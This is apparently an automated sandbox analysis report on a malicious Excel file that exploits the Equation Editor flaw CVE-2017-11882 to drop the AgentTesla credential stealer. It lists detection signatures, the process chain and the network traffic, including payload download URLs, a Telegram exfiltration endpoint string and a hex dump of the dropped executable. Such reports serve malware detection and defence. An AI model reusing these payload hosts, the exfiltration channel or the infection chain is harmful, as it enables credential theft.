
Analysis Report SpecificationX20202611.xlsx

Overview

General Information

Sample Name:SpecificationX20202611.xlsx
Analysis ID:323613
MD5:8bbf38221e93da549de22199cafb1ece
SHA1:4d650073a4fd46217e891c94d6eca54644addfb6
SHA256:1cea11e60bce272e08ef8906924229cc33ba41dc2903ca2c397eb0ca70d85196


Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AgentTesla
Contains functionality to detect sleep reduction / modifications
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2276 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2396 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • cmd.exe (PID: 2948 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\name.exe MD5: AD7B9C14083B52BC532FBA5948342B98)
      • name.exe (PID: 912 cmdline: C:\Users\Public\name.exe MD5: 45E25807FC1BD31A0B8309C44AFCE6E4)
        • name.exe (PID: 1616 cmdline: C:\Users\Public\name.exe MD5: 45E25807FC1BD31A0B8309C44AFCE6E4)
  • Hqfadrv.exe (PID: 3068 cmdline: 'C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe' MD5: 45E25807FC1BD31A0B8309C44AFCE6E4)
    • Hqfadrv.exe (PID: 2732 cmdline: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe MD5: 45E25807FC1BD31A0B8309C44AFCE6E4)
  • Hqfadrv.exe (PID: 1684 cmdline: 'C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe' MD5: 45E25807FC1BD31A0B8309C44AFCE6E4)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

Source | Rule | Description | Author | Strings (listed below each row)
C:\Users\user\AppData\Local\afqH.url | Methodology_Shortcut_HotKey | Detects possible shortcut usage for .URL persistence | @itsreallynick (Nick Carr)
  • 0x9b:$hotkey: \x0AHotKey=1
  • 0x0:$url_explicit: [InternetShortcut]
C:\Users\user\AppData\Local\afqH.url | Methodology_Contains_Shortcut_OtherURIhandlers | Detects possible shortcut usage for .URL persistence | @itsreallynick (Nick Carr)
  • 0x14:$file: URL=
  • 0x0:$url_explicit: [InternetShortcut]
C:\Users\user\AppData\Local\afqH.url | Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO | Detects possible shortcut usage for .URL persistence | @itsreallynick (Nick Carr)
  • 0x70:$icon: IconFile=
  • 0x0:$url_explicit: [InternetShortcut]

Memory Dumps

Source | Rule | Description | Author
00000007.00000002.2352654865.0000000001EE2000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000007.00000002.2353672409.000000000241C000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000007.00000002.2353672409.000000000241C000.00000004.00000001.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000007.00000002.2352856247.0000000002140000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0000000B.00000002.2352775112.0000000002060000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
(table truncated; the full report lists 15 entries)

Unpacked PEs

Source | Rule | Description | Author
7.2.name.exe.2140000.1.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
11.2.Hqfadrv.exe.2060000.2.raw.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
11.2.Hqfadrv.exe.450000.1.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
11.2.Hqfadrv.exe.450000.1.raw.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
11.2.Hqfadrv.exe.2060000.2.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
(table truncated; the full report lists 3 entries)

Sigma Overview

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882
Source: Process started | Author: Florian Roth | Data: Command: C:\Windows\system32\cmd.exe /c C:\Users\Public\name.exe, CommandLine: C:\Windows\system32\cmd.exe /c C:\Users\Public\name.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2396, ProcessCommandLine: C:\Windows\system32\cmd.exe /c C:\Users\Public\name.exe, ProcessId: 2948
Sigma detected: EQNEDT32.EXE connecting to internet
Source: Network Connection | Author: Joe Security | Data: DestinationIp: 128.199.253.44, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2396, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
Sigma detected: File Dropped By EQNEDT32EXE
Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2396, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\lxpo[1].exe
Sigma detected: Executables Started in Suspicious Folder
Source: Process started | Author: Florian Roth | Data: Command: C:\Users\Public\name.exe, CommandLine: C:\Users\Public\name.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\name.exe, NewProcessName: C:\Users\Public\name.exe, OriginalFileName: C:\Users\Public\name.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c C:\Users\Public\name.exe, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2948, ProcessCommandLine: C:\Users\Public\name.exe, ProcessId: 912
Sigma detected: Execution in Non-Executable Folder
Source: Process started | Author: Florian Roth | Data: Command: C:\Users\Public\name.exe, CommandLine: C:\Users\Public\name.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\name.exe, NewProcessName: C:\Users\Public\name.exe, OriginalFileName: C:\Users\Public\name.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c C:\Users\Public\name.exe, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2948, ProcessCommandLine: C:\Users\Public\name.exe, ProcessId: 912
Sigma detected: Suspicious Program Location Process Starts
Source: Process started | Author: Florian Roth | Data: Command: C:\Users\Public\name.exe, CommandLine: C:\Users\Public\name.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\name.exe, NewProcessName: C:\Users\Public\name.exe, OriginalFileName: C:\Users\Public\name.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c C:\Users\Public\name.exe, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2948, ProcessCommandLine: C:\Users\Public\name.exe, ProcessId: 912

Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: SpecificationX20202611.xlsx | Virustotal: Detection: 62%
Source: SpecificationX20202611.xlsx | ReversingLabs: Detection: 53%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Joe Sandbox ML: detected
Source: C:\Users\Public\name.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\lxpo[1].exe | Joe Sandbox ML: detected
Machine Learning detection for sample
Source: SpecificationX20202611.xlsx | Joe Sandbox ML: detected

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Windows\SysWOW64\cmd.exe
Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: 10_2_00408DE0 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: 10_2_004059A0 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: 4x nop then mov eax, dword ptr [00484078h]
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: 4x nop then mov eax, dword ptr [ebx]
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: 4x nop then or edx, 00000080h
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: 4x nop then mov edx, dword ptr [eax]
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: 4x nop then call 00402D28h
Source: global traffic | DNS query: name: khunnapap.com
Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 162.159.136.232:443
Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 128.199.253.44:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 100000132 COMMUNITY WEB-MISC Proxy Server Access 128.199.253.44:80 -> 192.168.2.22:49165
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 27 Nov 2020 07:27:03 GMTContent-Type: application/x-msdownloadContent-Length: 1218752Last-Modified: Wed, 25 Nov 2020 04:41:22 GMTConnection: keep-aliveETag: "5fbde072-1298c0"Accept-Ranges: bytesData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 af c1 0b 01 02 19 00 e8 07 00 00 56 0a 00 00 00 00 00 98 f6 07 00 00 10 00 00 00 00 08 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 b0 12 00 00 06 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 50 08 00 ca 24 00 00 00 30 09 00 00 7c 09 00 00 00 00 00 00 00 00 00 00 44 12 00 c0 54 00 00 00 a0 08 00 34 8f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 08 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 14 e7 07 00 00 10 00 00 00 e8 07 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 9c 21 00 00 00 00 08 00 00 22 00 
00 00 ee 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 35 11 00 00 00 30 08 00 00 00 00 00 00 10 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 ca 24 00 00 00 50 08 00 00 26 00 00 00 10 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 40 00 00 00 00 80 08 00 00 00 00 00 00 36 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 90 08 00 00 02 00 00 00 36 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 65 6c 6f 63 00 00 34 8f 00 00 00 a0 08 00 00 90 00 00 00 38 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 7c 09 00 00 30 09 00 00 7c 09 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 12 00 00 00 00 00 00 42 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: Joe Sandbox View | IP Address: 162.159.136.232
Source: Joe Sandbox View | ASN Name: DIGITALOCEAN-ASNUS
Source: global traffic | HTTP traffic detected: GET /inc/lxpo.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: khunnapap.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /components/com_messages/controllers/messages08/Hqfafff HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | Host: fanosethiopiatours.com
Source: global traffic | HTTP traffic detected: GET /components/com_messages/controllers/messages08/Hqfafff HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | Host: fanosethiopiatours.com
Source: global traffic | HTTP traffic detected: GET /components/com_messages/controllers/messages08/Hqfafff HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | Host: fanosethiopiatours.com
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\lxpo[1].exe
Source: global traffic | HTTP traffic detected: GET /inc/lxpo.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: khunnapap.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /components/com_messages/controllers/messages08/Hqfafff HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | Host: fanosethiopiatours.com
Source: global traffic | HTTP traffic detected: GET /components/com_messages/controllers/messages08/Hqfafff HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | Host: fanosethiopiatours.com
Source: global traffic | HTTP traffic detected: GET /components/com_messages/controllers/messages08/Hqfafff HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | Host: fanosethiopiatours.com
Source: unknown | DNS traffic detected: queries for: khunnapap.com
Source: name.exe, 00000007.00000002.2353672409.000000000241C000.00000004.00000001.sdmp, Hqfadrv.exe, 0000000B.00000002.2353817984.00000000023FC000.00000004.00000001.sdmp | String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: Hqfadrv.exe, 0000000B.00000002.2353817984.00000000023FC000.00000004.00000001.sdmp | String found in binary or memory: http://DynDns.comDynDNS
Source: Hqfadrv.exe, 0000000A.00000002.2343504552.0000000000294000.00000004.00000020.sdmp, Hqfadrv.exe, 0000000A.00000002.2343547059.00000000002D1000.00000004.00000020.sdmp | String found in binary or memory: http://fanosethiopiatours.com/components/com_messages/controllers/messages08/Hqfafff
Source: Hqfadrv.exe, Hqfadrv.exe, 0000000B.00000000.2338557274.0000000000401000.00000020.00020000.sdmp, Hqfadrv.exe.6.dr | String found in binary or memory: http://gorohov.narod.ru/index.htm
Source: name.exe, 00000006.00000000.2145781433.0000000000401000.00000020.00020000.sdmp, name.exe, 00000007.00000000.2214244196.0000000000401000.00000020.00020000.sdmp, Hqfadrv.exe, 00000009.00000000.2236985625.0000000000401000.00000020.00020000.sdmp, Hqfadrv.exe, 0000000A.00000000.2254253931.0000000000401000.00000020.00020000.sdmp, Hqfadrv.exe, 0000000B.00000000.2338557274.0000000000401000.00000020.00020000.sdmp, Hqfadrv.exe.6.dr | String found in binary or memory: http://gorohov.narod.ru/index.htmS
Source: Hqfadrv.exe, 0000000B.00000002.2353817984.00000000023FC000.00000004.00000001.sdmp | String found in binary or memory: http://rMSjwD.com
Source: name.exe, 00000007.00000002.2355651047.00000000057C0000.00000002.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: name.exe, 00000007.00000002.2355651047.00000000057C0000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
Source: Hqfadrv.exe, 0000000B.00000002.2353817984.00000000023FC000.00000004.00000001.sdmp | String found in binary or memory: https://api.ipify.orgGETMozilla/5.0
Source: name.exe, 00000007.00000002.2353672409.000000000241C000.00000004.00000001.sdmp, Hqfadrv.exe, 0000000B.00000002.2353817984.00000000023FC000.00000004.00000001.sdmp | String found in binary or memory: https://api.telegram.org/bot%telegramapi%/sendDocumentdocument---------------------------x
Source: name.exe, 00000007.00000002.2353672409.000000000241C000.00000004.00000001.sdmp, Hqfadrv.exe, 0000000B.00000002.2353817984.00000000023FC000.00000004.00000001.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown | Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49166 -> 443
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: 10_2_00435CA4 OpenClipboard,GlobalAlloc,GlobalFix,EmptyClipboard,SetClipboardData,GlobalUnWire,
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: 10_2_0042B278 GetClipboardData,CopyEnhMetaFileA,GetEnhMetaFileHeader,
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: 10_2_0042B8BC GetObjectA,GetDC,CreateCompatibleDC,CreateBitmap,CreateCompatibleBitmap,GetDeviceCaps,GetDeviceCaps,SelectObject,GetDIBColorTable,GetDIBits,SelectObject,CreateDIBSection,GetDIBits,SelectObject,SelectPalette,RealizePalette,FillRect,SetTextColor,SetBkColor,SetDIBColorTable,PatBlt,CreateCompatibleDC,SelectObject,SelectPalette,RealizePalette,SetTextColor,SetBkColor,BitBlt,SelectPalette,SelectObject,DeleteDC,SelectPalette,
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: 10_2_0043E2D8 GetKeyboardState,
Source: C:\Users\Public\name.exe | Window created: window name: CLIPBRDWNDCLASS

System Summary:

Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\lxpo[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\name.exe
Source: C:\Users\Public\name.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\Public\name.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\Public\name.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\Public\name.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: 10_2_0045C770 NtdllDefWindowProc_A,
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: 10_2_00441274 NtdllDefWindowProc_A,GetCapture,
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: 10_2_0045CF14 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: 10_2_0045CFC4 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: 10_2_00435110 NtdllDefWindowProc_A,
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: 10_2_0045197C GetSubMenu,SaveDC,RestoreDC,GetWindowDC,SaveDC,RestoreDC,NtdllDefWindowProc_A,
Source: C:\Users\Public\name.exe | Code function: 7_2_00408C60
Source: C:\Users\Public\name.exe | Code function: 7_2_0040DC11
Source: C:\Users\Public\name.exe | Code function: 7_2_00407C3F
Source: C:\Users\Public\name.exe | Code function: 7_2_00418CCC
Source: C:\Users\Public\name.exe | Code function: 7_2_00406CA0
Source: C:\Users\Public\name.exe | Code function: 7_2_004028B0
Source: C:\Users\Public\name.exe | Code function: 7_2_0041A4BE
Source: C:\Users\Public\name.exe | Code function: 7_2_00418244
Source: C:\Users\Public\name.exe | Code function: 7_2_00401650
Source: C:\Users\Public\name.exe | Code function: 7_2_00402F20
Source: C:\Users\Public\name.exe | Code function: 7_2_004193C4
Source: C:\Users\Public\name.exe | Code function: 7_2_00418788
Source: C:\Users\Public\name.exe | Code function: 7_2_00402F89
Source: C:\Users\Public\name.exe | Code function: 7_2_00402B90
Source: C:\Users\Public\name.exe | Code function: 7_2_004073A0
Source: C:\Users\Public\name.exe | Code function: 7_2_003EF638
Source: C:\Users\Public\name.exe | Code function: 7_2_003EE618
Source: C:\Users\Public\name.exe | Code function: 7_2_003E1040
Source: C:\Users\Public\name.exe | Code function: 7_2_003EE960
Source: C:\Users\Public\name.exe | Code function: 7_2_003E12B8
Source: C:\Users\Public\name.exe | Code function: 7_2_003E132C
Source: C:\Users\Public\name.exe | Code function: 7_2_003E1371
Source: C:\Users\Public\name.exe | Code function: 7_2_003E1394
Source: C:\Users\Public\name.exe | Code function: 7_2_003E0FCF
Source: C:\Users\Public\name.exe | Code function: 7_1_00408C60
Source: C:\Users\Public\name.exe | Code function: 7_1_0040DC11
Source: C:\Users\Public\name.exe | Code function: 7_1_00407C3F
Source: C:\Users\Public\name.exe | Code function: 7_1_00418CCC
Source: C:\Users\Public\name.exe | Code function: 7_1_00406CA0
Source: C:\Users\Public\name.exe | Code function: 7_1_004028B0
Source: C:\Users\Public\name.exe | Code function: 7_1_0041A4BE
Source: C:\Users\Public\name.exe | Code function: 7_1_00418244
Source: C:\Users\Public\name.exe | Code function: 7_1_00401650
Source: C:\Users\Public\name.exe | Code function: 7_1_00402F20
Source: C:\Users\Public\name.exe | Code function: 7_1_004193C4
Source: C:\Users\Public\name.exe | Code function: 7_1_00418788
Source: C:\Users\Public\name.exe | Code function: 7_1_00402F89
Source: C:\Users\Public\name.exe | Code function: 7_1_00402B90
Source: C:\Users\Public\name.exe | Code function: 7_1_004073A0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: 10_2_00456B7C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: 10_2_00434E00
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: 10_2_0045197C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: 11_2_00408C60
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: 11_2_0040DC11
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: 11_2_00407C3F
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: 11_2_00418CCC
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: 11_2_00406CA0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: 11_2_004028B0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: 11_2_0041A4BE
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: 11_2_00418244
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: 11_2_00401650
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: 11_2_00402F20
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: 11_2_004193C4
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: 11_2_00418788
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: 11_2_00402F89
